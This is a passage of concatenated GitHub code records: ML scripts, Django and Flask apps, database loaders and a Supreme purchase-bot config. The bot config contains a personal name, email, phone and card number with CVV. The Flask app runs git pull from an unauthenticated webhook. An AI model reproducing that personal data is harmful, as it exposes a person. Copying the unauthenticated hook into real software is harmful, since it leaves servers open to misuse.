7)\n self.assertEqual(sqr.y, 18)\n\n def test_square_update_args_over_kwargs(self):\n sqr = Square(11, 3, 2, 13)\n sqr.update(25, id=18)\n self.assertEqual(sqr.id, 25)\n\n def test_square_to_dict(self):\n sqr = Square(34, 3, 7, id=40)\n sqr_dict = {\n 'size': 34, 'x': 3, 'y': 7, 'id': 40\n }\n\n self.assertEqual(\n sqr_dict,\n sqr.to_dictionary()\n )\n\n self.assertEqual(\n type(sqr.to_dictionary()),\n dict\n )\n\n with self.assertRaises(TypeError):\n sqr.to_dictionary(5)\n\n def test_square_create(self):\n sqr = Square(3, 4, 7, 8)\n sqr_dict = sqr.to_dictionary()\n sqr2 = sqr.create(**sqr_dict)\n sqr2_dict = sqr2.to_dictionary()\n\n self.assertEqual(sqr_dict, sqr2_dict)\n","repo_name":"Idris01/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33279164606","text":"from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.category_view,name=\"index\"),\n path(\"update/\",views.update_category_details,name=\"update_category_details\"),\n path(\"delete_category//\",views.delete_category,name=\"delete_category\"),\n path(\"delete_product//\",views.delete_product,name=\"delete_product\"),\n path(\"product_detail//\",views.product_detail,name=\"product_detail\"),\n path(\"logout/\",views.Userlogout,name=\"logout\")\n]","repo_name":"Pranav0707/HeadStrait-Full-Stack-Assignment","sub_path":"Categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42249507755","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport subprocess\nimport shlex\nfrom platform import system\nimport sys\n\n__all__ = [\"get_data\", \"normalize_particular_columns\"]\n\nDATA_FOLDER = \"./data\"\n\ndef read_column_names(file):\n with open(file, 'r') as f:\n content = f.readlines()\n \n return [x.strip() for x in content]\n\ndef delete_mostly_nan_columns(df):\n column_names = list()\n all_entries = len(df.index)\n nan_values = df.isnull().sum().to_numpy()\n\n for i in range(len(nan_values)):\n if (nan_values[i]/all_entries)>=0.3:\n column_names.append(df.columns[i])\n\n for name in column_names:\n if name in df.columns:\n del df[name]\n\ndef get_data(city_name): \n columns_names = read_column_names('./data/header.txt')\n if system() != \"Linux\":\n sys.exit(\"Only linux is supported\")\n \n subprocess.call(shlex.split(f'./get_files.sh {city_name}'))\n df_smt = pd.read_csv(f'./data/s_m_t_{city_name}.csv', names=columns_names[1:], index_col=False)\n delete_mostly_nan_columns(df_smt)\n return df_smt\n\ndef normalize_particular_columns(df, column_names):\n for col_name in column_names:\n df.iloc[:,col_name]=(df.iloc[:,col_name]-df.iloc[:,col_name].mean())/df.iloc[:,col_name].std()","repo_name":"9albert6/mkird","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28721395539","text":"from nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nimport re,string\nexclude = set(string.punctuation)\nprint (exclude)\nfile = open(r\"sample.txt\", \"r\")\n# doc = re.sub(r\"[(\\[\\]),;:\\.]\", \"\", file.read())\nstop_words = set(stopwords.words('english'))\nprint(stop_words)\ntokens =file.read().split()\nprint(tokens)\nre_punc = re.compile('[%s]' % re.escape(string.punctuation))\nword_tokens = [re_punc.sub('', w) for w in tokens]\n# print(word_tokens)\n# wordcount = Counter(word_tokens)\n# print(wordcount)\n# for i in set(word_tokens):\n# print(i,word_tokens.count(i))\n\n# csv_file = open('word.csv','a')\n# for i in set(word_tokens):\n# result=i+','+str(word_tokens.count(i))+'\\n'\n# csv_file.write(result)\n# csv_file.close()\nfiltered_sentence = [w for w in word_tokens if not w.lower() in stop_words and w not in \"\"]\n#\nwordcount = Counter(filtered_sentence)\nprint(wordcount)\nfirst3pairs =[word for word,cnt in wordcount.most_common(3)]\nprint(first3pairs)","repo_name":"thameem786/POC_CODE","sub_path":"demo/word count.py","file_name":"word count.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26126040406","text":"#思路1的生成器\ndef pascal_triangle1(n):\n list = [1]\n while n > 0:\n yield list\n list = [1] + [list[x] + list[x + 1] for x in range(len(list) - 1)] + [1]\n n -= 1\n return\nfor x in pascal_triangle1(5):\n print(x)\n\n\n#思路2的生成器\ndef pascal_triangle2(n):\n list = [1]\n while n > 0:\n yield list\n list = [1] + [x + y for x, y in zip(list[:], list[1:])] + [1]\n n -= 1\n return\nfor y in pascal_triangle2(10):\n print(y)","repo_name":"Danie1Hayes/Python-Notes","sub_path":"练习程序/杨辉三角.py","file_name":"杨辉三角.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28504064912","text":"import pymysql\nfrom auth import *\nimport pandas as pd\nimport time\n#read df already saved from running previous script\ndf = pd.read_csv('youtube.csv', index_col=0)\n\ndef connect_to_db():\n try:\n connection = pymysql.connect(host=ENDPOINT,user=USERNAME,\\\n password=DB_PASSWORD,database=DATABASE_NAME,port=PORT)\n except pymysql.OperationalError as e:\n raise e\n else:\n cursor = connection.cursor()\n print('Connected!')\n\n return connection, cursor\n\ndef create_table(cursor):\n query_create_table = (\"\"\"CREATE TABLE IF NOT EXISTS videos_details\n (video_id VARCHAR(100) PRIMARY KEY,\n video_title TEXT NOT NULL ,\n upload_date DATE NOT NULL,\n view_count int NOT NULL,\n like_count int NOT NULL,\n dislike_count int NOT NULL,\n comment_count int NOT NULL \n )\n \"\"\")\n cursor.execute(query_create_table)\n\ndef insert_row(cursor, video_id, video_title, upload_date, view_count, like_count, dislike_count, comment_count):\n query_insert_row = (\"\"\"\n INSERT INTO videos_details (video_id,video_title,upload_date,view_count\n , like_count, dislike_count,comment_count)\n VALUES (%s,%s,%s,%s,%s,%s,%s);\n \"\"\")\n values = (video_id, video_title, upload_date, view_count, like_count, dislike_count, comment_count)\n cursor.execute(query_insert_row,values)\n\ndef check_vid_not_exist(cursor,video_id):\n query_search_vid_id = (\"\"\"\n SELECT * FROM videos_details\n WHERE video_id = %s\n \"\"\")\n cursor.execute(query_search_vid_id,(video_id,))\n result = cursor.fetchone() is None\n return result\n\ndef insert_in_table(cursor):\n df2=pd.DataFrame(columns=list(df.columns))\n #iterate over all videos\n for i,row in df.iterrows():\n #for each video if it video_id doesn't exist,\n #insert row in table\n if check_vid_not_exist(cursor, row['video_id']):\n insert_row(cursor, row['video_id'], row['video_title'], row['upload_date'], row['view_count']\n , row['like_count'], row['dislike_count'], row['comment_count'])\n else:\n df2.append(row)\n return df2\n\ndef update_row(cursor, video_id, video_title, view_count, like_count, dislike_count, comment_count):\n query_update_row = (\"\"\"UPDATE videos_details\n SET video_title = %s,\n view_count = %s,\n like_count = %s,\n dislike_count = %s,\n comment_count = %s\n WHERE video_id = %s;\"\"\")\n values = (video_title, view_count, like_count, dislike_count, comment_count, video_id)\n cursor.execute(query_update_row, values)\n\ndef update_table(cursor, df):\n for i, row in df.iterrows():\n update_row(row['video_id'], row['video_title'], row['upload_date'], row['view_count']\n , row['like_count'], row['dislike_count'], row['comment_count'])\n \n#connect to db\nconnection, cursor = connect_to_db()\n#create table in db\ncreate_table(cursor)\n#insert values one by one into the table:\n#1/if they don't exist use INSERT INTO\ndf2 = insert_in_table(cursor)\nconnection.commit()\n#2/if they exist update video details\nupdate_table(cursor, df2)\nconnection.commit()\n#Fetch all to make sure everything worked\nquery_fetch_all = (\"\"\"\nSELECT * FROM videos_details;\n \"\"\")\ncursor.execute(query_fetch_all)\ncursor.fetchall()\n#DROP table because of aws charges\nquery_fetch_all = (\"\"\"\nDROP TABLE videos_details;\n \"\"\")\ncursor.execute(query_fetch_all)\nconnection.commit()\n#close the connection\nconnection.close()","repo_name":"FaithSmith/youtube_api_aws_rds","sub_path":"df_to_rds_aws.py","file_name":"df_to_rds_aws.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35056450351","text":"\"\"\"\nCurrently as of 11/30/2018, supreme allows for 2018-2028 as card expiration years \nThere year are 1-10 in the xpath selector for that dropdown.\n\"\"\"\n\nkeys = {\n \"product_url\": \"https://www.supremenewyork.com/shop/accessories/oypgt0xhn\",\n \"name\": \"Ahvi Blackwell\",\n \"email\": \"alblackwelldev@outlook.com\",\n \"phone_number\": 4152637658,\n \"address\": \"1234 Grewnway Dr\",\n \"city\": \"\",\n \"state\": \"CA\",\n \"zip\": 94803,\n \"card_number\": 4232783632431124,\n \"card_cvv\": 323,\n \"credit_card_month\": 4,\n \"credit_card_year\": 6 # see docs above\n}\n","repo_name":"ahvblackwelltech/supreme_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23040895545","text":"import argparse\nimport json\n\nimport torch\nfrom transformers import GenerationConfig, AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\nfrom lora_model import LoraModelForCasualLM\nfrom prompt import Prompter\n\ndef get_response(prompt, tokenizer, model, generation_config, max_new_tokens):\n inputs = tokenizer(prompt, return_tensors=\"pt\")\n output = model.generate(\n input_ids=inputs['input_ids'].cuda(),\n generation_config=generation_config,\n max_new_tokens=max_new_tokens,\n do_sample=True)\n output = tokenizer.batch_decode(output, skip_special_tokens=True)[0]\n return output\n\ndef generate_inference(instruction: str, user_inp: str, model_path:str, lora_weights_path:str):\n \n top_k=40\n top_p=128\n temperature=0.1\n load_8bit=True\n num_beams =1\n max_new_tokens =128\n\n tokenizer = AutoTokenizer.from_pretrained(model_path)\n \n config = AutoConfig.from_pretrained(model_path)\n architecture = config.architectures[0]\n if \"Llama\" in architecture:\n print(\"Setting EOS, BOS, UNK, and PAD tokens for LLama tokenizer\")\n tokenizer.add_special_tokens(\n {\n \"eos_token\": \"\",\n \"bos_token\": \"\",\n \"unk_token\": \"\",\n }\n )\n tokenizer.pad_token_id = (\n 0 # unk. we want this to be different from the eos token\n )\n tokenizer.padding_side = \"left\"\n \n model = AutoModelForCausalLM.from_pretrained(\n model_path,\n load_in_8bit=load_8bit,\n torch_dtype=torch.float16,\n device_map=\"auto\")\n model = LoraModelForCasualLM.from_pretrained(\n model,\n lora_weights_path,\n torch_dtype=torch.float16)\n \n model.config.pad_token_id = tokenizer.pad_token_id\n model.config.bos_token_id = tokenizer.bos_token_id\n model.config.eos_token_id = tokenizer.eos_token_id\n model.eval()\n \n generation_config = GenerationConfig(\n temperature=temperature,\n top_p=top_p,\n top_k=top_k,\n num_beams=num_beams)\n \n prompter = Prompter()\n \n \n \n # instruction = input(\"Your Instruction: \")\n # user_inp = input(\"Your input (enter n/a if there is no): \")\n if user_inp.lower().strip() == \"n/a\":\n user_inp = None\n prompt = prompter.generate_prompt(instruction, user_inp)\n output = get_response(prompt, tokenizer, model, generation_config, max_new_tokens)\n response = prompter.get_response(output)\n return response\n \n","repo_name":"vietai-dev/nlp03","sub_path":"week6/distributed/assignment2/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"36792003384","text":"\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport os, base64, io, string\r\nimport azure.storage.blob as azureblob\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport json\r\nfrom keras.models import load_model\r\nfrom azure.storage.blob import BlockBlobService\r\n\r\n\r\ndef load_image_into_numpy_array(image):\r\n (im_width, im_height) = image.size\r\n return np.array(image.getdata()).reshape(\r\n (im_height, im_width, 3)).astype(np.uint8)\r\n\r\ndef int2base(x, base,maxlen=11, digs=string.digits + string.ascii_letters):\r\n if x < 0:\r\n sign = -1\r\n elif x == 0:\r\n return digs[0]*maxlen\r\n else:\r\n sign = 1\r\n x *= sign\r\n digits = []\r\n while x:\r\n digits.append(digs[int(x % base)])\r\n x //= base\r\n if maxlen>len(digits):\r\n digits += '0'*(maxlen - len(digits))\r\n if sign < 0:\r\n digits.append('-')\r\n digits.reverse()\r\n return ''.join(digits)\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--filedir', required=True,\r\n help='The dir name of images to process. The path'\r\n 'may include a compute node\\'s environment'\r\n 'variables, such as'\r\n '$AZ_BATCH_NODE_SHARED_DIR/filename.txt')\r\n parser.add_argument('--model', required=True,\r\n help='The full file path to the model. The path'\r\n 'may include a compute node\\'s environment'\r\n 'variables, such as'\r\n '$AZ_BATCH_NODE_SHARED_DIR/filename.txt')\r\n parser.add_argument('--storageaccount', required=True,\r\n help='The name of the Azure Storage account that owns the'\r\n 'blob storage container to which to upload'\r\n 'results and from which to download images.')\r\n parser.add_argument('--storagecontainer', required=True,\r\n help='The Azure Blob storage container to which to'\r\n 'upload results.')\r\n parser.add_argument('--sastoken', required=True,\r\n help='The SAS token providing write access to the'\r\n 'Storage container.')\r\n parser.add_argument('--startqkey', required=False, default='0333313',\r\n help='the range of images that this task has to process')\r\n\r\n args = parser.parse_args()\r\n\r\n filedir = args.filedir\r\n startqkey= args.startqkey\r\n \r\n model_name = args.model\r\n model = load_model(model_name)\r\n labels = {0: 'iscloud', 1: 'ismine', 2: 'isnone'}\r\n\r\n # Create the blob client using the input container's SAS token.\r\n # This allows us to create a client that provides read\r\n # access only to the container.\r\n #blob_client_out = azureblob.BlockBlobService(account_name=args.storageaccount,\r\n # sas_token=args.sastoken)\r\n\r\n # blob_client = azureblob.BlockBlobService(\r\n # account_name=args.storageaccount,\r\n # account_key=args.accountkey)\r\n\r\n # blobs=blob_client.list_blobs(container_name=args.inputcontainer, prefix=filedir) \r\n \r\n # blobs_to_process = [blob.name for blob in blobs if '.jpg' in blob.name ]\r\n\r\n # for blob in blobs_to_process:\r\n # blob_client.get_blob_to_path(container_name=args.inputcontainer, blob_name= blob, file_path= blob.replace('/','_'))\r\n \r\n # local_file_names=[blob.replace('/','_') for blob in blobs_to_process]\r\n \r\n # imgdict={}\r\n # #imgdict['pippo']='pluto'\r\n # imgdict = create_color_gist(local_file_names)\r\n ntilesbase4='3'*(18-len(startqkey))\r\n ntiles = int(ntilesbase4,4)+1\r\n results = []\r\n for i in range(ntiles):\r\n ibase4=int2base(i,4, maxlen=18-len(startqkey))\r\n imgfile = os.path.join(filedir, startqkey+ ibase4 +\".jpg\")\r\n pilImg = Image.open(imgfile)\r\n x = load_image_into_numpy_array(pilImg)\r\n x = np.expand_dims(x, axis=0)\r\n y = model.predict(x)\r\n #result = \r\n res = {\"quadkey\" : startqkey+ ibase4, \"result\": {\"class\": labels[np.argmax(y[0])] , \"score\": float(np.max(y[0])) } } \r\n results.append(res) \r\n if i%100==0:\r\n print(i)\r\n # FINALLY\r\n output_file = 'score_out_'+startqkey+'.json'# needs to be the output dict, \r\n # needs to have no headers to append to other results later\r\n # and the reference to the image something like 0000/fiename.jpg\r\n \r\n with open(output_file, 'w') as file:\r\n file.write(json.dumps(results))\r\n \r\n '''\r\n with open(output_file, \"w\") as text_file:\r\n print(\"------------------------------\", file=text_file)\r\n print(\"Node: \" + os.environ['AZ_BATCH_NODE_ID'], file=text_file)\r\n print(\"Task: \" + os.environ['AZ_BATCH_TASK_ID'], file=text_file)\r\n print(\"Job: \" + os.environ['AZ_BATCH_JOB_ID'], file=text_file)\r\n print(\"Pool: \" + os.environ['AZ_BATCH_POOL_ID'], file=text_file)\r\n '''\r\n\r\n # Create the blob client using the output container's SAS token.\r\n # This allows us to create a client that provides write\r\n # access only to the container.\r\n blob_client = azureblob.BlockBlobService(account_name=args.storageaccount,\r\n sas_token=args.sastoken)\r\n\r\n output_file_path = os.path.realpath(output_file)\r\n\r\n print('Uploading file {} to container [{}]...'.format(\r\n output_file_path,\r\n args.storagecontainer))\r\n\r\n blob_client.create_blob_from_path(args.storagecontainer,\r\n output_file,\r\n output_file_path)\r\n\r\n\r\n ","repo_name":"noodlefrenzy/StrataDataLondon2018","sub_path":"az_batch/python_scoring_task.py","file_name":"python_scoring_task.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"26043131859","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.db.utils import IntegrityError\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom api.utils import json\nfrom threadedcomments.models import ThreadedComment, RelatedComment\n\ndef relate_comment(request, acrion, comment_pk):\n if not request.user.is_authenticated():\n return HttpResponse(status=403)\n if not acrion in ('remove_vote', 'agree', 'disagree'):\n raise Http404\n comment = get_object_or_404(ThreadedComment, pk=comment_pk)\n if acrion == 'remove_vote':\n RelatedComment.objects.filter(user=request.user, comment=comment).delete()\n else:\n relate = RelatedComment.objects.get_or_create(comment=comment, user=request.user)[0]\n if acrion == 'agree':\n relate.relate = '+'\n else:\n relate.relate = '-'\n try:\n relate.save()\n except IntegrityError:\n pass\n return HttpResponse(status=200)\n\ndef remove_comment(request, comment_pk):\n if not request.user.is_superuser:\n return HttpResponse(status=403)\n comment = get_object_or_404(ThreadedComment, pk=comment_pk)\n comment.is_removed = True\n comment.save()\n obj = comment.content_object\n return redirect(obj.get_absolute_url())\n","repo_name":"modamania/otdohni","sub_path":"apps/api/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9277981391","text":"import torch.nn as nn\n'''Vanilla Autoencoder'''\nclass AutoEncoder(nn.Module):\n def __init__(self, image_size1: int, image_size2: int):\n super(AutoEncoder, self).__init__()\n self.encoder = nn.Sequential(\n # Orign AE\n nn.Linear(image_size1 * image_size2, 512),\n nn.ReLU(),\n nn.Linear(512, 32),\n nn.ReLU(),\n )\n self.decoder = nn.Sequential(\n nn.Linear(32, 512),\n nn.ReLU(),\n nn.Linear(512, image_size1 * image_size2),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n encoded = self.encoder(x)\n decoded = self.decoder(encoded)\n return encoded, decoded","repo_name":"heart-of-gol-d/HAE_Empowered_by_Quadratic_Neurons","sub_path":"quadratic_autoencoder/AEModel/AE.py","file_name":"AE.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7552642291","text":"from main import _\nfrom utils.HIGDialog import HIGDialog\n\nimport gtk\n\n\n#\n# Class for the display configurator. It displays the configurators of the\n# sensors of a display.\n#\nclass DisplayConfigurator(HIGDialog):\n\n def __init__(self, sensorconfigurators):\n\n HIGDialog.__init__(self, buttons=(gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE))\n self.set_property(\"title\", _(\"Configuration\"))\n\n def destroy(*args): self.destroy()\n\n self.connect(\"response\", destroy)\n\n # close functions\n pages = []\n for c in sensorconfigurators:\n if (c):\n lbl = gtk.Label(c.get_name())\n lbl.show()\n pages.append((c, lbl))\n\n # use a special page when there are no config options\n if (not pages):\n lbl = gtk.Label(_(\"This desklet is not configurable.\"))\n lbl.show()\n pages.append((lbl, None))\n\n # only use the notebook when there are more than one pages\n if (len(pages) == 1):\n self.vbox.add(pages[0][0])\n else:\n align = gtk.Alignment(0.0, 0.0, 0.0, 0.0)\n align.show()\n notebook = gtk.Notebook()\n notebook.set_property(\"border-width\", 6)\n notebook.show()\n align.add(notebook)\n self.vbox.pack_start(align, False, False, 0)\n for page, tab in pages:\n notebook.append_page(page, tab)\n\n self.show()\n\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"display/DisplayConfigurator.py","file_name":"DisplayConfigurator.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74027686942","text":"import asyncio\n\nfrom werkzeug.utils import call_maybe_yield, cached_property\nimport aiopg\nfrom aiopg.sa import create_engine, dialect\nimport psycopg2\nfrom sqlalchemy.schema import CreateTable\nfrom sqlalchemy.sql import ClauseElement\n\nfrom galerka.util import asyncached\n\n\ndef postgres_middleware(app):\n @asyncio.coroutine\n def add_postgres(environ, start_response):\n connection = SQLConnection(environ['galerka.postgres.get_pool'])\n environ['galerka.postgres.connection'] = connection\n try:\n result = yield from call_maybe_yield(app, environ, start_response)\n return result\n except:\n yield from connection.rollback()\n raise\n else:\n yield from connection.commit()\n finally:\n yield from connection.close()\n return add_postgres\n\n\nclass SQLConnection:\n def __init__(self, get_pool):\n self.get_pool = get_pool\n self.connection = None\n self.transaction = None\n\n @asyncached\n def pool(self):\n return (yield from self.get_pool())\n\n @asyncio.coroutine\n def execute(self, query, *multiparams, **params):\n if not self.connection:\n pool = yield from self.pool\n self.connection = yield from pool.acquire()\n self.transaction = yield from self.connection.begin()\n if isinstance(query, ClauseElement):\n print(query.compile(dialect=dialect))\n else:\n print(repr(query), multiparams, params)\n result = yield from self.connection.execute(query,\n *multiparams,\n **params)\n return result\n\n @asyncio.coroutine\n def commit(self):\n if self.transaction:\n yield from self.transaction.commit()\n\n @asyncio.coroutine\n def rollback(self):\n if self.transaction:\n yield from self.transaction.rollback()\n\n @asyncio.coroutine\n def close(self):\n if self.connection:\n yield from self.connection.close()\n\n\ndef postgres_pool_factory(dsn, tables):\n @asyncio.coroutine\n def get_pool():\n pool = yield from create_engine(dsn)\n\n connection = yield from pool.acquire()\n try:\n result = yield from connection.execute(\n 'SELECT tablename FROM pg_tables '\n 'WHERE schemaname=%s', ('public', ))\n existing_table_names = {name[0] for name in result}\n print('Existing tables:', existing_table_names)\n\n for name, table in tables.metadata.tables.items():\n if name not in existing_table_names:\n create_statement = CreateTable(table)\n print(create_statement.compile(dialect=dialect))\n yield from connection.execute(create_statement)\n finally:\n connection.close()\n\n return pool\n pool_future = asyncio.Task(get_pool())\n\n @asyncio.coroutine\n def get_pool():\n return (yield from pool_future)\n\n return get_pool\n\n\nclass PostgresMixin:\n def execute_sql(self, *args, **k):\n return self.environ['galerka.postgres.connection'].execute(*args, **k)\n\n @cached_property\n def sql_tables(self, *args, **k):\n return self.environ['galerka.postgres.tables']\n","repo_name":"encukou/galerka","sub_path":"galerka/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28551543560","text":"import math\n\nimport theano\n\nimport theano.tensor as T\nimport theano.tensor.nlinalg as alg\n\nclass RBF_layer(Network_Layer):\n\n def __init__(self, m_c_init, v_c_init, non_linear = True):\n\n # We create the theano variables for the means and variances\n\n self.m_c = theano.shared(value = m_c_init.astype(theano.config.floatX),\n name='m_c', borrow = True)\n\n self.v_c = theano.shared(value = v_c_init.astype(theano.config.floatX),\n name='v_c', borrow = True)\n self.w = theano.shared(value = m_c_init.astype(theano.config.floatX),\n name='c', borrow = True)\n # We store the type of activation function\n\n self.non_linear = non_linear\n\n # We store the number of inputs\n\n self.n_inputs = theano.shared(int(m_c_init.shape[ 1 ]))\n\n @staticmethod\n def n_pdf(x):\n\n return 1.0 / T.sqrt(2 * math.pi) * T.exp(-0.5 * x**2)\n\n @staticmethod\n def n_cdf(x):\n\n return 0.5 * (1.0 + T.erf(x / T.sqrt(2.0)))\n\n @staticmethod\n def gamma(x):\n\n return Network_layer.n_pdf(x) / Network_layer.n_cdf(-x)\n\n @staticmethod\n def beta(x):\n\n return Network_layer.gamma(x) * (Network_layer.gamma(x) - x)\n\n def output_probabilistic(self, m_c_previous, v_c_previous):\n\n # We add an additional deterministic input with mean 1 and variance 0\n\n #m_c_previous_with_bias = \\\n #T.concatenate([ m_c_previous, T.alloc(1, 1) ], 0)\n #v_c_previous_with_bias = \\\n #T.concatenate([ v_c_previous, T.alloc(0, 1) ], 0)\n\n # We compute the mean and variance after the linear operation\n\n\n m_linear = self.m_c - m_c_previous\n\n #m_linear = T.dot(self.m_c, m_c_previous_with_bias) / T.sqrt(self.n_inputs)\n v_linear = self.v_c\n\n if (self.non_linear):\n\n # We compute the mean and variance after the RBF activation\n\n lam = 0.1\n v_1 = 1 + 2*lam*v_linear\n\n\n v_1_inv = v_1**-1\n s_1 = T.prod(v_1,axis=1)**-0.5\n\n v_2 = 1 + 4*lam*v_linear\n v_2_inv = v_2**-1\n\n\n s_2 = T.prod(v_2,axis=1)**-0.5\n\n\n\n v_inv = v_linear**-1\n\n\n\n\n\n exponent1 = m_linear*(1 - v_1_inv)*v_inv\n\n exponent1 = T.sum(exponent1,axis=1)\n\n exponent2 = m_linear**2*(1 - v_2_inv)*v_inv\n\n exponent2 = T.sum(exponent2,axis=1)\n\n\n m_a = s_1*T.exp(-0.5*exponent1)\n\n\n v_a = s_2*T.exp(-0.5*exponent2) - m_a**2\n\n\n # lam = 1\n # I = T.eye(self.n_inputs)\n#\n # v_1 = I + 2*lam*v_linear\n # print_op= theano.printing.Print('v_1')\n # v_1 = print_op(v_1)\n#\n # def compute_inverse(v):\n # return alg.MatrixInverse()(v)\n#\n#\n # v_1_inv,update = theano.map(compute_inverse, sequences=v_1)\n # s_1,update = theano.map(lambda v: alg.Det()(v), sequences=v_1)\n # s_1 = s_1**-0.5\n#\n#\n # v_2 = I + 4*lam*v_linear\n # v_2_inv,update = theano.map(lambda v: alg.MatrixInverse()(v), sequences=v_2)\n # s_2,update = theano.map(lambda v: alg.Det()(v), sequences=v_2)\n#\n # s_2 = s_2**-0.5\n # v_inv,update = theano.map(lambda v: alg.MatrixInverse()(v), sequences=v_linear)\n#\n # m_a = s_1*T.exp(-0.5*m_linear.T*(I - v_1_inv)*v_inv*m_linear)\n#\n # v_a = s_2*T.exp(-0.5*m_linear.T*(I - v_2_inv)*v_inv*m_linear - m_a**2)\n return (m_a, v_a)\n\n else:\n\n return (m_linear, v_linear)\n\n def output_deterministic(self, output_previous):\n\n # We add an additional input with value 1\n\n output_previous_with_bias = \\\n T.concatenate([ output_previous, T.alloc(1, 1) ], 0) / \\\n T.sqrt(self.n_inputs)\n\n # We compute the mean and variance after the linear operation\n\n a = T.dot(self.w, output_previous_with_bias)\n\n if (self.non_linear):\n\n # We compute the ReLU activation\n\n a = T.switch(T.lt(a, T.fill(a, 0)), T.fill(a, 0), a)\n\n return a\n","repo_name":"jefshe/rbfnn-ep-thesis","sub_path":"EP/rbf_layer.py","file_name":"rbf_layer.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15807423679","text":"import flask\nimport data_proc as db_tool\nimport math\nimport os\nfrom datetime import timedelta\napp = flask.Flask(__name__)\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = timedelta(seconds=1)\n\n\n@app.route(\"/hook\", methods=['POST'])\ndef hook():\n # 调用本地脚本进行更新\n os.system(\"git pull\")\n return 'ok'\n\n\n@app.route(\"/data/\")\ndef data(data_name):\n file_name = \"data/\"+data_name+\".csv\"\n if os.path.exists(file_name):\n return flask.render_template('data.html',\n data=flask.Markup(db_tool.markdown_trans(db_tool.to_table(file_name, \",\"))))\n else:\n return flask.render_template('404.html')\n\n\n@app.route(\"/download/\", methods=['GET'])\ndef download_file(filename):\n return flask.send_from_directory(\"data\", filename+\".csv\", as_attachment=True)\n\n\n@app.route(\"/article/\")\ndef article(article_id):\n if article_id in db_tool.articles:\n entity = db_tool.articles[article_id]\n return flask.render_template(\"article.html\", title=entity['title'],\n date=entity['date'], html=flask.Markup(entity['html']),\n detail_tags=flask.Markup(db_tool.get_detail_tags_html(article_id)))\n else:\n return flask.render_template('404.html')\n\n\ndef paging_html(objs, show_head, href):\n page_size = 7\n max_paging = 3\n paging = flask.request.args.get('paging')\n if paging is None or str(paging).isdigit():\n size = math.ceil(len(objs) / page_size)\n if paging is None:\n cur_page = 1\n elif int(paging) <= size:\n cur_page = int(paging)\n else:\n cur_page = 0\n if cur_page == 0:\n return flask.render_template('404.html')\n else:\n list_data = flask.Markup(''.join(objs[((cur_page - 1) * page_size):(cur_page * page_size)]))\n return flask.render_template(\"home.html\",\n list_data=list_data,\n list_title=show_head,\n paging=flask.Markup(db_tool.get_paging(size, cur_page, max_paging, href)))\n else:\n return flask.render_template('404.html')\n\n\n@app.route(\"/\")\ndef hello():\n content = list()\n for item in db_tool.home_index:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, 'Recent Update', '')\n\n\n@app.route(\"/about\")\ndef about():\n return flask.render_template(\"about.html\")\n\n\n@app.route(\"/tags\")\ndef tags():\n out = list()\n for key in db_tool.tags_index:\n out.append(db_tool.get_tags_html(key))\n return flask.render_template(\"tags.html\", tags=flask.Markup(''.join(out)))\n\n\n@app.route(\"/categories\")\ndef categories():\n out = list()\n for key in db_tool.category_index:\n out.append(db_tool.get_category_html(key))\n return flask.render_template(\"categories.html\", cate=flask.Markup(''.join(out)))\n\n\n@app.route('/categories_list//')\ndef categories_list(cate_key, sub_cate):\n content = list()\n for item in db_tool.category_index[cate_key][sub_cate]:\n content.append(db_tool.get_item_html(item['article_id'], item['title'], item['date']))\n return paging_html(content, \"分类:\"+cate_key+\" > \"+sub_cate,\n 